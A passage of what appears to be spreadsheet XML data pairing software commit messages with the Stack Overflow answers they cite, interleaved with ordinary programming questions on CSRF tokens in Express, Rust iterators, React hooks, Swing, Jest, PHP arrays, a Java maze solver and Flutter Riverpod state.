            notifyBorrowerPending(borrowerLendingNotificationToken);
        }
    }, [initialNotificationSettings]);
    if (loadingInitialSettings) {
        return (
            &lt;View style={[styles.container, styles.horizontal]}&gt;
                &lt;ActivityIndicator size="large" color="#FF5D4E" /&gt;
            &lt;/View&gt;
        )
    }
    if (initialSettingsError) return &lt;Text&gt;Error...&lt;/Text&gt;
    return (
        &lt;SafeAreaView style={styles.container}&gt;
        &lt;/SafeAreaView&gt;
    )
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having an issue with &lt;code&gt;doubleCsrf&lt;/code&gt; in my &lt;strong&gt;Express.js&lt;/strong&gt; backend, and I keep getting the following error on every request:&lt;/p&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;ForbiddenError: invalid csrf token
    at doubleCsrf (file:///Users/admin/Documents/backend/node_modules/csrf-csrf/lib/esm/index.js:13:35)
    at file:///Users/admin/Documents/backend/routes/auth/csrfMiddleware.js:10:5
    at ModuleJob.run (node:internal/modules/esm/module_job:218:25)
    at async ModuleLoader.import (node:internal/modules/esm/loader:329:24)
    at async loadESM (node:internal/process/esm_loader:28:7)
    at async handleMainPromise (node:internal/modules/run_main:113:12) {
  code: 'EBADCSRFTOKEN
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Backend:&lt;/h1&gt;
&lt;p&gt;Here is my middleware setup in &lt;strong&gt;csrfMiddleware.js:&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { doubleCsrf } from &amp;quot;csrf-csrf&amp;quot;;
import dotenv from 'dotenv';
dotenv.config();
const {
    doubleCsrfProtection,
    generateToken,
    invalidCsrfTokenError
} = doubleCsrf({
    getSecret: () =&amp;gt; process.env.VITE_CSRF_SECRET,
    cookieName: &amp;quot;XSRF-TOKEN&amp;quot;,
    cookieOptions: {
        httpOnly: false,
        secure: false,
        sameSite: &amp;quot;Lax&amp;quot;,
        path: &amp;quot;/&amp;quot;,
        partitioned: true,
    },
    ignoredMethods: [&amp;quot;GET&amp;quot;, &amp;quot;HEAD&amp;quot;, &amp;quot;OPTIONS&amp;quot;], 
    getTokenFromRequest: (req) =&amp;gt; {
        console.log(&amp;quot;CSRF-token from request headers:&amp;quot;, req.headers[&amp;quot;x-csrf-token&amp;quot;]);
        console.log(&amp;quot;CSRF-token from cookies:&amp;quot;, req.cookies[&amp;quot;XSRF-TOKEN&amp;quot;]);
        return req.cookies[&amp;quot;XSRF-TOKEN&amp;quot;];
    },
});
export { doubleCsrfProtection, generateToken, invalidCsrfTokenError };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then in** server.js,** I generate and store the CSRF token in a cookie:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;app.get('/api/auth/csrf-token', (req, res) =&amp;gt; {
    const csrfToken = generateToken(req, res);
    res.clearCookie(&amp;quot;XSRF-TOKEN&amp;quot;);
    res.cookie(&amp;quot;XSRF-TOKEN&amp;quot;, csrfToken, {
        httpOnly: false,
        secure: false,
        sameSite: &amp;quot;Lax&amp;quot;,
        path: &amp;quot;/&amp;quot;
    });
    res.json({ csrfToken });
});
// ðŸ“Œ **API routes**
app.use('/api', apiRouter);
// âœ… CSRF protection applied here
app.use(doubleCsrfProtection);
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Frontend (Vue)&lt;/h1&gt;
&lt;p&gt;On the frontend, I'm fetching the CSRF token before making any API requests:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import axios from 'axios';
const baseURL = import.meta.env.VITE_API_BASE_URL;
const axiosInstance = axios.create({
  baseURL,
  withCredentials: true,
});
let isFetchingCsrfToken = false;
const fetchCsrfToken = async () =&amp;gt; {
  if (isFetchingCsrfToken) return;
  isFetchingCsrfToken = true;
  try {
    const response = await axiosInstance.get('/auth/csrf-token');
    if (response.data.csrfToken) {
      document.cookie = `XSRF-TOKEN=${response.data.csrfToken}; path=/`;
      axiosInstance.defaults.headers.common['X-CSRF-Token'] = response.data.csrfToken;
      console.log('CSRF-token set:', response.data.csrfToken);
    }
  } catch (error) {
    console.error('Error fetching CSRF token:', error);
  } finally {
    isFetchingCsrfToken = false;
  }
};
fetchCsrfToken();
export default axiosInstance;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I log &lt;code&gt;document.cookie&lt;/code&gt; in the console tab, I can see the token correctly set.
Also The backend logs show that the token is received in the request headers and cookies&lt;/p&gt;
&lt;p&gt;What could be the issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C34</t>
  </si>
  <si>
    <t>refactor(plfix): Use vectors instead of iterators
I will need to reuse playlists and playcounts due to future upcoming
functionality. This means they have to be vectors, not one-off
iterators.
Now, the functions remove_playlist_duplicates() and
merge_playcount_duplicates() ideally would intake mutable impl IntoIterator
references, but that does not seem to be possible, because IntoIterator
doesn't guarantee that all elements returned by the iterator are unique.
Each element in an iterator loop has a lifetime equal to that of the
iterator, which means that theoretically two mutable references to the
same element could exist, which is illegal.
(source: https://stackoverflow.com/a/63438431/10792539)
I'm not 100% sure that my understanding of this is correct. In
particular, Rust has to know *sometimes* that iterator returns unique
elements. Otherwise, how would iter_mut() ever work?
For now though, I'm simply changing the argument type to &amp;mut Vec&lt;&gt;,
because it does the job just fine.</t>
  </si>
  <si>
    <t>The borrow checker is unable to prove that subsequent calls to next() won't access the same data. The reason why this is a problem is because the lifetime of the borrow is for the duration of the life of the iterator, so it can't prove that there won't be two mutable references to the same data at the same time.
There really isn't a way to solve this without unsafe code - or changing your data structures. You could do the equlivant of slice::split_at_mut but, given that you can't mutate the original data, you'd have to implement that in unsafe code anyway. An unsafe implementation could look something like this:
impl&lt;'a, T&gt; Iterator for IterMut&lt;'a, T&gt; {
    type Item = &amp;'a mut T;
    fn next(&amp;mut self) -&gt; Option&lt;Self::Item&gt; {
        let i = self.cursor;
        self.cursor += 1;
        if i &lt; self.obj.inner.len() {
            let ptr = self.obj.inner.as_mut_ptr();
            unsafe {
                Some(&amp;mut *ptr.add(i))
            }
        } else {
            None
        }
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">We have need for a "rating" system in a project we are working on, similar to the one in SO. However, in ours there are multiple entities that need to be "tagged" with a vote up (only up, never down, like an increment). Sometimes we will need to show all of the entities in order of what is rated highest, regardless of entity type, basically mixing the result sets, I guess. What data structures / algorithms do you use to implement this so that is flexible and still scalable?
</t>
  </si>
  <si>
    <t>C340</t>
  </si>
  <si>
    <t>Use compgen -G instead of ls for finding enabled components  best practices in scripting and performance optimization 
Reference: https://stackoverflow.com/a/34195247/1228454</t>
  </si>
  <si>
    <t xml:space="preserve">How would one create a REST web service to write a row into a databse table. Use the follwoing scenario:
  The table is called Customer - the
  data to be inserted into the row would
  be the name, addresss, telephone
  number, email.
I think its impossible to describe the whole thing end to end in Java or C#, and I would never expect that, but here are the questions I have popping into my head as I prepare for coding:
How the URI would look (eg. if you use this URL - [external-link])?
What info would go into the HTTP envelope?
Would I use POST when writing to the database in this way?
Do I use a resource to store the posted data from the client? Is this even necessary if the data is being written to a database anyway?
When the data to be writeen into the db is recieved by the server - how do I physically insert it into the database - do I call some method on the server to actually write the data (in Java)? - this doesn't seem to fit with truely REST architecture - shunning RPC calls.
Should I even be bothering writing to a DB - should I be storing my data as a resource?
As you can see I need a few issues clearing in my head.  Any help much appreciated.
</t>
  </si>
  <si>
    <t>C341</t>
  </si>
  <si>
    <t>Fix self-report page crash
TIL useEffect() takes the return value to be a 'cleanup function' when
the component unmounts.
https://stackoverflow.com/a/58495799</t>
  </si>
  <si>
    <t>You're returning the result of calling
getResponse()
from the
useEffect
function. If you return anything from
useEffect
, it has to be a function. Changing your code to this should fix it because you're no longer returning anything from the
useEffect
function.
useEffect(() =&gt; { 
  getResponse();
});
The
useEffect
Cleanup Function
If you return anything from the
useEffect
hook function, it must be a
cleanup function
. This function will run when the component unmounts. This can be thought of as roughly equivalent to the
componentWillUnmount
lifecycle method in class components.
useEffect(() =&gt; { 
  doSomething();
  return () =&gt; {
    console.log("This will be logged on unmount");
  }
});</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I cannot find the reason why my code doesn't work. It keeps saying that there's a infinite recursion error. I'm basically trying to solve a maze recursively.&lt;/p&gt;
&lt;p&gt;The start and end of the maze are represented with the characters + and -, respectively. The first line of the maze file will be the number of rows and columns, respectively.As your program moves through the maze the current path should
also be marked with the + character. Any path leading to
a dead end should be marked with the . character.
Here is the maze:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://drive.google.com/file/d/1l15E0Iqvkp-mnPP_vbTfvx93RXjAJzRo/view?usp=sharing" rel="nofollow noreferrer"&gt;https://drive.google.com/file/d/1l15E0Iqvkp-mnPP_vbTfvx93RXjAJzRo/view?usp=sharing&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.io.*;
import java.util.*;
public class Main {
    public static char[][] maze;
    public static int rows, cols, beginR, beginC;
    public static boolean solve = false;
    public static void main(String[] args) {
        boolean load = loadmaze(&amp;quot;maze.txt&amp;quot;);
        if (load == false) { 
            System.out.println(&amp;quot;Failed to load Maze&amp;quot;); 
            return;
        }
        if (solverMaze(beginR, beginC)) { 
            System.out.println(&amp;quot;Congrats you beat the Maze!&amp;quot;);
        }
        else {
            System.out.println(&amp;quot;Not found&amp;quot;);
        }
        pMaze();
    }
    public static boolean loadmaze(String filename) {
         File file = new File(filename);
        try(Scanner scan = new Scanner(file)) {
            rows = scan.nextInt();
            cols = scan.nextInt();
            scan.nextLine(); 
            maze = new char[rows][cols]; 
            for(int i = 0; i &amp;lt; rows; i++) {
                String lines = scan.nextLine();
                for(int l = 0; l &amp;lt; cols; l++) {
                    maze[i][l] = lines.charAt(l);
                    if(maze[i][l] == '+') {
                        beginR = i; 
                        beginC = l;
                    }
                }
        }
        return true; 
        } catch(FileNotFoundException e) {
            System.out.println(&amp;quot;Error in loading file&amp;quot;);
        }
          catch(Exception e) {
            System.out.println(&amp;quot;Error in read maze&amp;quot;);
          }
          return false;
        }
    private static boolean solverMaze(int row, int column) {
        if( row &amp;lt; 0 || column &amp;lt; 0 
           || row &amp;gt;=rows 
           || column &amp;gt;=cols 
           || maze[row][column] == 'X' 
           || maze[row][column] == '.' 
           || solve) {
         return false;
        }
        if(maze[row][column] == '-') {
            solve = true; 
            return true;
        }
        if(maze[row][column] != '+' ) {
            maze[row][column] = '+';
        }
        if(solverMaze(row + 1, column) 
           || solverMaze(row - 1, column) 
           || solverMaze(row, column + 1) 
           || solverMaze(row, column - 1)) {
            return true; 
        }
        maze[row][column] = '.';
        return false;
  }
  private static void pMaze() {
        for (char[] row : maze) {
            System.out.println(new String(row));
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried tinkering with backtracking but I had no luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C342</t>
  </si>
  <si>
    <t>Resolved Error Preventing Page components Loading
Previously the application was loaded but no components were loaded on the page and the console casted errors tha are complaining abou the pathname ie. Uncaught TypeError: Cannot read properties of  undefined (reading 'pathname') and some &lt;Link&gt; in aboutComponent. To which based on the resolution : https://stackoverflow.com/a/50072179 this happens when a react &lt;Link&gt; hasnt supplied with a to='' property</t>
  </si>
  <si>
    <t>The error is because the api in React Router v4 is totally different.
You can try this:
import React from 'react';
import ReactDOM from 'react-dom';
import {
  BrowserRouter as Router,
  Route
} from 'react-router-dom';
const Main = () =&gt; &lt;h1&gt;Hello world&lt;/h1&gt;;
ReactDOM.render(
  &lt;Router&gt;
    &lt;Route path='/' component={Main} /&gt;
  &lt;/Router&gt;,
  document.getElementById('app')
);
You can review the
documentation
to learn how it works now.
Here
I have a repo with routing animation.
And
here
you can find a live demo.</t>
  </si>
  <si>
    <t xml:space="preserve">We are building a "configurator" application for conveyors. Basically user comes in and picks a model, then start picking the parts they want. Some components have dependencies on other components. E.g. if I pick Part A, then I am required to select 1 or more Part B's. It is somewhat similar to configuring a PC at Dell.com. The app will also provide suggestions on parts/components.
Based on this info, I am researching if there is an existing pattern(s) that would allow us to make this easy to maintain and design. Any thoughts, ideas? Are there any open source projects that have similar functionality I can borrow ideas/patterns?
I am mostly interested in how to define "rules" between components without hardcoding the rules/dependencies.
Thanks for any help.
Not that it should matter, but we are building this in .NetFramework 3.5/Asp.Net
</t>
  </si>
  <si>
    <t>C343</t>
  </si>
  <si>
    <t>Call repaint() in addition to validate() when removing components.
See https://stackoverflow.com/questions/1097366/java-swing-revalidate-vs-repaint</t>
  </si>
  <si>
    <t>You need to call
repaint()
and
revalidate()
. The first one tells Swing that an area of the window is dirty (which is necessary to erase the image of the old children removed by
removeAll()
); the second one tells the layout manager to recalculate the layout (which is necessary when adding components). This should cause
children
of the panel to repaint, but may not cause the panel itself to do so (see
this
for the list of repaint triggers).
On a more general note: rather than reusing the original panel, I'd recommend building a new panel and swapping them at the parent.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been making a small game in pygame to teach myself some of the basics. I've tried to make the movement better with vector2 in pygame. However I can't think of a way to stop my character going off screen.&lt;/p&gt;
&lt;p&gt;I managed to do this with the standard key inputs using the SCREEN_WIDTH and SCREEN_HEIGHT by checking if it is out of these boundaries. This is the code that works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if key[pygame.K_a] and self.rect.left &amp;gt; 0:
            self.rect.x -= speed
        if key[pygame.K_d] and self.rect.right &amp;lt; SCREEN_WIDTH:
            self.rect.x += speed
        if key[pygame.K_w] and self.rect.top &amp;gt; 0:
            self.rect.y -= speed
        if key[pygame.K_s] and self.rect.bottom &amp;lt; SCREEN_HEIGHT:
            self.rect.y += speed
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I don't know how I would do this while using the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        key = pygame.key.get_pressed()
        up = key[pygame.K_w]
        down = key[pygame.K_s]
        left = key[pygame.K_a]
        right = key[pygame.K_d]
        move = pygame.math.Vector2(right - left, down - up)
        if move.length_squared() &amp;gt; 0:
            move.scale_to_length(speed)
            self.rect.move_ip(round(move.x), round(move.y))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there even a way to do this while using this method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C344</t>
  </si>
  <si>
    <t>changed pom component to generate cross-platform fat jar as shown in
https://stackoverflow.com/questions/52653836/maven-shade-javafx-runtime-components-are-missing</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to build a CMS site based on Asp.Net Mvc and I want to choose my starting point.
I have seen that there is a lot of interest in the new Microsoft Oxite project also if it seems to be pretty early to adopt it in a production project.
I've also looked at S#arp Architecture but it does not properly compare to Oxite as is just a starting point for general Asp.Net Mvc sites.
For me S#arp Architecture has some advantages over Oxite as is far less complex and it uses Nhibernate for the data access layer.
Oxite code uses Linq2Sql for it's DAL and has already a project in the solution that requires the DB version for VS2008.
Oxite seems to me more blog oriented than CMS oriented but I havenâ€™t looked the code deeply.
Here are some of the choices that would point me to S#arp Ar. for starting.
Simple clean architecture
Nhibernate Dal
Community supported
Oxite:
Microsoft project  
Potential huge community  
Early stages but very good code quality  
Provider model that permits to easily switch the DAL  
If anyone has looked at the code of these two projects please advice on your opinions.
Thanks
</t>
  </si>
  <si>
    <t>C345</t>
  </si>
  <si>
    <t>fix: jest error parsing svg components
The error was fixed by mocking svg files in jest, see https://stackoverflow.com/questions/65075111/the-tag-reactcomponent-is-unrecognized-in-this-browser</t>
  </si>
  <si>
    <t>You need to mock SVG files as jest struggles with SVG for some reason.
Create a
__mock__
folder. The directory should be adjacent to node_modules. The setup should be:
svgrMock.js:
//__mocks__/svgrMock.js
import * as React from 'react'
export default 'SvgrURL'
export const ReactComponent = 'svg'
package.json
...
  "jest": {
    "moduleNameMapper": {
      "\\.svg": "&lt;rootDir&gt;/__mocks__/svgrMock.js"
    }
  },
Just bear in mind only the following are valid methods for importing SVGs after this fix:
import logoURL from '../assets/logo.svg'
// and
import { ReactComponent as Logo } from '../assets/logo.svg'
Full details:
https://react-svgr.com/docs/jest/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on the frdm RW612 board and have the following code that measures the temperature in the room over a few days.  My script works fine but I have no way of gathering this data. The temperature code is down below.  Does anyone have any ideas?&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;//Homework 4 Seaver Olson
#include &amp;quot;pin_mux.h&amp;quot;
#include &amp;quot;clock_config.h&amp;quot;
#include &amp;quot;board.h&amp;quot;
#include &amp;quot;fsl_device_registers.h&amp;quot;
#include &amp;quot;fsl_debug_console.h&amp;quot;
float DEMO_MeasureTemperature(void);
float DEMO_MeasureTemperature(void)
{
    uint16_t tempRawValue = 0U;
    if (0UL == ((SENSOR_CTRL-&amp;gt;MISC_CTRL_REG &amp;amp; SENSOR_CTRL_MISC_CTRL_REG_TIMER_1_ENABLE_MASK) &amp;gt;&amp;gt;
                SENSOR_CTRL_MISC_CTRL_REG_TIMER_1_ENABLE_SHIFT))
    {
        SENSOR_CTRL-&amp;gt;MISC_CTRL_REG |= SENSOR_CTRL_MISC_CTRL_REG_TIMER_1_ENABLE_MASK;
    }
    tempRawValue = (((SENSOR_CTRL-&amp;gt;TSEN_CTRL_1_REG_2) &amp;amp; SENSOR_CTRL_TSEN_CTRL_1_REG_2_TSEN_TEMP_VALUE_MASK) &amp;gt;&amp;gt;
                    SENSOR_CTRL_TSEN_CTRL_1_REG_2_TSEN_TEMP_VALUE_SHIFT);
    return (tempRawValue * 0.480561F - 220.7074F);
}
int main(void)
{
    BOARD_InitBootPins();
    BOARD_InitBootClocks();
    BOARD_InitDebugConsole();
    // 60 x 24
    for (int i = 0; i &amp;lt; 5760; i++) {
        double temp = ((double)DEMO_MeasureTemperature());
        PRINTF(&amp;quot;%d: %.3f\n&amp;quot;, i, temp);
        for (int j = 0; j &amp;lt; 30; j++){
        SDK_DelayAtLeastUs(1000000, CLOCK_GetCoreSysClkFreq());
    }
}
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried taking it from the serial using &lt;code&gt;minicom --capturefile&lt;/code&gt;. This doesn't work as I do not have a device that can be idle listening to the RW612 for that long.  I would prefer if I was able to create a file on the rw612 board and take it later but anything that can retrieve the data works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C346</t>
  </si>
  <si>
    <t>update: similar torrent component
- Change Array Push To Array Assign (https://stackoverflow.com/questions/559844/whats-better-to-use-in-php-array-value-or-array-pusharray-value)</t>
  </si>
  <si>
    <t>I personally feel like
$array[]
is cleaner to look at, and honestly splitting hairs over milliseconds is pretty irrelevant unless you plan on appending hundreds of thousands of strings to your array.
I ran this code:
$t = microtime(true);
$array = array();
for($i = 0; $i &lt; 10000; $i++) {
    $array[] = $i;
}
print microtime(true) - $t;
print '&lt;br&gt;';
$t = microtime(true);
$array = array();
for($i = 0; $i &lt; 10000; $i++) {
    array_push($array, $i);
}
print microtime(true) - $t;
The first method using
$array[]
is almost 50% faster than the second one.
Some benchmark results:
Run 1
0.0054171085357666 // array_push
0.0028800964355469 // array[]
Run 2
0.0054559707641602 // array_push
0.002892017364502 // array[]
Run 3
0.0055501461029053 // array_push
0.0028610229492188 // array[]
This shouldn't be surprising, as the PHP manual notes this:
If you use array_push() to add one element to the array it's better to use $array[] =  because in that way there is no overhead of calling a function.
The way it is phrased I wouldn't be surprised if
array_push
is more efficient when adding multiple values. Out of curiosity, I did some further testing, and even for a large amount of additions, individual
$array[]
calls are faster than one big
array_push
. Interesting.</t>
  </si>
  <si>
    <t xml:space="preserve">There are some rumors floating around that the team at my company will soon be using web services for all future application development.  The architecture is supposed to be something like this:
Application --&gt; Web Service --&gt; Database
The stated reasoning behind it is security.  This sounds like a huge waste of time for little if any benefit.  My question is, in what ways does a web service make your data more secure than a database?  I would think that if an attacker wanted to get all your data and had already gotten onto the app server, it would be fairly trivial to figure out how the application is getting it's data.
Please keep in mind that these web services would be purely for data, and would have little if any business/validation logic, and would also be outside the application developers control (at least that's the way it's worked with all previous applications that have used web services).
</t>
  </si>
  <si>
    <t>C347</t>
  </si>
  <si>
    <t>updated tsconfig.json to enable Absolute Imports support
References:
1. https://create-react-app.dev/docs/importing-a-component/#absolute-imports
2. https://stackoverflow.com/a/59195974</t>
  </si>
  <si>
    <t>Create a file called
.env
in the project root and write there:
NODE_PATH=src
Then restart the development server. You should be able to import anything inside
src
without relative paths.
Note I would not recommend calling your folder
src/redux
because now it is confusing whether
redux
import refers to your app or the library. Instead you can call your folder
src/app
and import things from
app/...
.
We intentionally don't support custom syntax like
@redux
because it's not compatible with Node resolution algorithm.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I wrote up this helper function when I first started my project to help update objects that I would get from an API.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export const setValRecursive = (currObj: any, newObj: any) =&amp;gt; {
  Object.keys(newObj).forEach((k: any) =&amp;gt; {
    if (typeof newObj[k] == &amp;quot;object&amp;quot; &amp;amp;&amp;amp; currObj[k] != null) {
      setValRecursive(newObj[k], currObj[k]);
    } else {
      currObj[k] = newObj[k];
    }
  });
  return currObj;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Recently, I forgot about that helper function and found and started using Object.assign in other components to help merge together different objects that stored CSS variables.&lt;/p&gt;
&lt;p&gt;Now that's I've re-looked at an old component and saw it again, I was curious to know what the difference between the two functions, is there performance issues, are there reference issues, should I switch to using Object.assign or is there no problem using either?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C348</t>
  </si>
  <si>
    <t>Fixed installmirrors ref
Nested inline markup is not (yet) possible: http://stackoverflow.com/a/9645684
Upstream-commit: 188dea9e0e8b968b28a288192c357343dcc5834c
Component: engine</t>
  </si>
  <si>
    <t>At the moment it seems that this is not possible: see the Docutils FAQ, specifically the question
"Is nested inline markup possible"
. The answer basically states that nested inline markup is on the to do list, so it will eventually be possible to do what you ask in the question, and provides a couple of work arounds (which they state are not recommended).
Since the workarounds are not recommended perhaps for the time being you could just do something like:
**Lorem ipsum dolor sit amet,** `consectetur &lt;http://www.example.com&gt;`_ 
**adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore 
magna aliqua.**
Of course your link would not be bold, but at least it will be a valid link.</t>
  </si>
  <si>
    <t xml:space="preserve">What is domain logic?  The Wikipedia page for domain logic redirects to business logic.  Are they the same thing, and, if not, how do they differ?
</t>
  </si>
  <si>
    <t>C349</t>
  </si>
  <si>
    <t>Switched to useRef() to maintain state
After reading StackOverflow article
(https://stackoverflow.com/questions/56511176/state-being-reset) a
standard event listener callback gets executed in its own closure
instead of the parent component. useRef() the recommended solution.</t>
  </si>
  <si>
    <t>The problem is here:
useEffect(() =&gt; {
    // Component did mount
    console.log("Component did mount")
    window.addEventListener("resize", updateBox); //HERE
    return () =&gt; {
      window.removeEventListener("resize", updateBox);
    };
  }, []);
the
updateBox
function you are binding to the resize window event will use the state it had at the moment it was bounded (when the component did mount) because the callback of
addEventListener
is executed in its own closure.
To solve this you have to save the state inside a ref, that way it will still be current, also when you are accessing it from another closure.
so first create the ref and store the state in it:
const [layoutState,setLayoutState] = useState(initLayout);
const layoutRef= useRef({});
layoutRef.current = layoutState;
and then inside the
updateBox
function you have to read the layout "state" from
layoutRef
instead of
layoutState
:
const updateBox = () =&gt; {
    let percentage = (layoutRef.current.size.height/layoutRef.current.size.width) * 100
    if(percentage &gt; 100){
      percentage = 100
    }
    percentage = percentage+"%"
    const cloneBoxStyle = clone(boxStyle);
    cloneBoxStyle.width = "100%"
    cloneBoxStyle.height = percentage
    setBoxStyle(cloneBoxStyle)
  }
Let me know if it works and please give feedback since this is my first answer here :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building an app with the following features so far&lt;/p&gt;
&lt;p&gt;My Account, Chat &amp;amp; Edit preferences&lt;/p&gt;
&lt;p&gt;Then I build with riverpod generation two models, user and matchUser&lt;/p&gt;
&lt;p&gt;I would want to fetch the user on My Account as that is the root page, then in the edit preferences to get the existing fetched user to edit &amp;amp; save.&lt;/p&gt;
&lt;p&gt;In the chat i would want to get the same user and then fetch something based on the user info&lt;/p&gt;
&lt;p&gt;My Account:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  final userAsync = ref.watch(userNotifierProvider);
  child: userAsync.when(
                  data: (user) {
                    //reset is_active to false as not looking for match
                    ref
                        .read(userNotifierProvider.notifier)
                        .updateUserAndRefetch({'is_active': false});
                    _genderSelectedIndex = genders.indexOf(user.gender);
                    _selectedHobbies = List&amp;lt;String&amp;gt;.from(user.hobbies);
                    _interestSelectedIndex = genders.indexOf(user.interestIn);
                    _lookingForIndex =
                        lookingForListEnums.indexOf(user.lookingFor);
                    dobController.text = DateFormat('dd-MM-yyyy')
                        .format(DateTime.parse(user.dob))
                        .toString();
                    heightController.text = user.height.toString();
                    return SingleChildScrollView()
......
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit Preferences:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  Future&amp;lt;void&amp;gt; onSaveClick() async {
    setState(() {
      _isLoading = true;
    });
    Map&amp;lt;String, dynamic&amp;gt; updatedData = {
      &amp;quot;gender&amp;quot;: genders[_genderSelectedIndex ?? 0],
      &amp;quot;hobbies&amp;quot;: _selectedHobbies,
      &amp;quot;interest_in&amp;quot;: genders[_interestSelectedIndex ?? 0],
      &amp;quot;looking_for&amp;quot;: lookingForListEnums[_lookingForIndex ?? 0],
      &amp;quot;min_age&amp;quot;: _ageRangeValues.start.toInt(),
      &amp;quot;max_age&amp;quot;: _ageRangeValues.end.toInt(),
    };
    await ref
        .read(userNotifierProvider.notifier)
        .updateUserAndRefetch(updatedData);
    setState(() {
      _isLoading = false;
    });
  }
  @override
  void initState() {
    super.initState();
    user = ref.read(userNotifierProvider).value as UserClass;
    _genderSelectedIndex = genders.indexOf(user.gender);
    _selectedHobbies += List&amp;lt;String&amp;gt;.from(user.hobbies);
    _interestSelectedIndex = genders.indexOf(user.interestIn);
    _lookingForIndex = lookingForListEnums.indexOf(user.lookingFor);
    _ageRangeValues =
        RangeValues(user.minAge.toDouble(), user.maxAge.toDouble());
    _genderValue = user.gender;
    _interestValue = user.interestIn;
    _lookingForValue = user.lookingFor;
  }
Center(
                          child: CustomElevatedButton(
                              onPressed: isSaveEnabled
                                  ? () {
                                      setState(() {
                                        _formSubmitted = true;
                                      });
                                      if (_genderValue.isNotEmpty &amp;amp;&amp;amp;
                                          _interestValue.isNotEmpty &amp;amp;&amp;amp;
                                          _selectedHobbies.isNotEmpty &amp;amp;&amp;amp;
                                          _lookingForValue.isNotEmpty) {
                                        onSaveClick();
                                        SnackbarGlobal.show(
                                            'Preferences updated',
                                            Colors.green);
                                        Navigator.pushNamed(
                                            context, 'homePage');
                                      }
                                    }
                                  : null,
                              isLoading: _isLoading,
                              child: const Text('Save'))),
......
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Chat page&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import 'package:flutter/material.dart';
import 'package:flutter_riverpod/flutter_riverpod.dart';
import 'package:glint/chat/chat_page.dart';
import 'package:glint/models/matchUser.dart';
import 'package:glint/search_user_page/loading_screen.dart';
class SearchUserPage extends ConsumerStatefulWidget {
  const SearchUserPage({super.key});
  @override
  ConsumerState&amp;lt;SearchUserPage&amp;gt; createState() =&amp;gt; _SearchUserPageState();
}
class _SearchUserPageState extends ConsumerState&amp;lt;SearchUserPage&amp;gt; {
  @override
  void initState() {
    super.initState();
  }
  @override
  Widget build(BuildContext context) {
    final matchedUser = ref.watch(fetchMatchedUsersProvider);
    return matchedUser.when(
        data: (match) {
          if (match == null) {
            return const LoadingScreen();
          } else {
            return const Center(child: ChatPage());
          }
        },
        error: (Object error, StackTrace stackTrace) {
          return const Text('Something went wrong');
        },
        loading: () =&amp;gt; const LoadingScreen());
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;matchUser.dart&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import 'package:flutter_riverpod/flutter_riverpod.dart';
import 'package:glint/models/user.dart';
import 'package:riverpod_annotation/riverpod_annotation.dart';
import 'package:supabase_flutter/supabase_flutter.dart';
part 'matchUser.g.dart';
@riverpod
Future&amp;lt;Map&amp;lt;String, dynamic&amp;gt;?&amp;gt; fetchMatchedUsers(Ref ref) async {
  final supabase = Supabase.instance.client;
  ref.read(userNotifierProvider.notifier
      .select((v) =&amp;gt; v.updateUserNoRefetch({'is_active': true})));
  final user = ref.read(userNotifierProvider).value as UserClass;
  try {
    List&amp;lt;Map&amp;lt;String, dynamic&amp;gt;&amp;gt; matchedUser =
        await supabase.rpc('get_matching_users', params: {
      'p_user_id': user.id,
      'p_gender': user.gender,
      'p_interest_in': user.interestIn,
      'p_min_age': user.minAge,
      'p_max_age': user.maxAge,
      'p_looking_for': user.lookingFor,
    });
    if (matchedUser.isNotEmpty) {
      final chat = await supabase.rpc('start_chat',
          params: {'p_user1_id': user.id, 'p_user2_id': matchedUser[0]['id']});
      return {...matchedUser[0], 'chat_id': chat};
    }
  } catch (error) {
    throw Exception('Failed to fetch matched users');
  }
  return null;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;user model&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@riverpod
class UserNotifier extends _$UserNotifier {
  @override
  Future&amp;lt;UserClass&amp;gt; build() async {
    return await fetchUser();
  }
  Future&amp;lt;UserClass&amp;gt; fetchUser() async {
    final user = Supabase.instance.client.auth.currentUser;
    final response = await Supabase.instance.client
        .from('users')
        .select()
